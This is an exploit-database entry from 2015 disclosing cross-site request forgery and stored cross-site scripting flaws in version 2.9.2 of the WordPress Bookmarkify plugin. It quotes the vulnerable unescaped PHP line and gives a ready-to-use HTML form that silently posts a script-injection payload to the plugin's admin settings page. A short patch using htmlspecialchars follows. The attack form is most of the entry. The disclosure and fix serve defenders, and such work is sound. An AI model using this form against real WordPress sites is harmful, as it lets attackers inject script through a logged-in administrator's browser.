WordPress Bookmarkify 2.9.2 Cross Site Request Forgery / Cross Site Scripting Vulnerabilities

2015-08-10T00:00:00
ID 1337DAY-ID-24004
Type zdt
Reporter Mahdi.Hidden
Modified 2015-08-10T00:00:00

Description

WordPress Bookmarkify plugin version 2.9.2 suffers from cross site request forgery and cross site scripting vulnerabilities.

                                        
                                            ######################
# Exploit Title : Wordpress Bookmarkify Plug-in XSS/CSRF
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/bookmarkify/
# Date: 2015-08-07
# Tested On : Kali Linux - FireFox
# Software Link : https://downloads.wordpress.org/plugin/bookmarkify.zip
# Version : 2.9.2
######################
# Vulnerable Code:
File: bookmarkify.php - Line 906

<input id="WidgetTitle" name="WidgetTitle" type="text" value="<?php  
echo $widgetTitle; ?>" size="35">
######################
# Exploit:

<form method="post"  
action="http://[URL]/[Path]/wp-admin/options-general.php?page=bookmarkify.php">
<input id="WidgetTitle" name="WidgetTitle" type="hidden"  
value='"><script>alert(/Mahdi.Hidden/)</script>"'>
<input name="BookmarkifyUpdate" type="submit" value="Update Options »">
</form>
######################
# Patch:
File: bookmarkify.php - Line 906

<input id="WidgetTitle" name="WidgetTitle" type="text" value="<?php  
echo htmlspecialchars($widgetTitle); ?>" size="35">
######################
# Discovered By : Mahdi.Hidden
######################

#  0day.today [2018-03-28]  #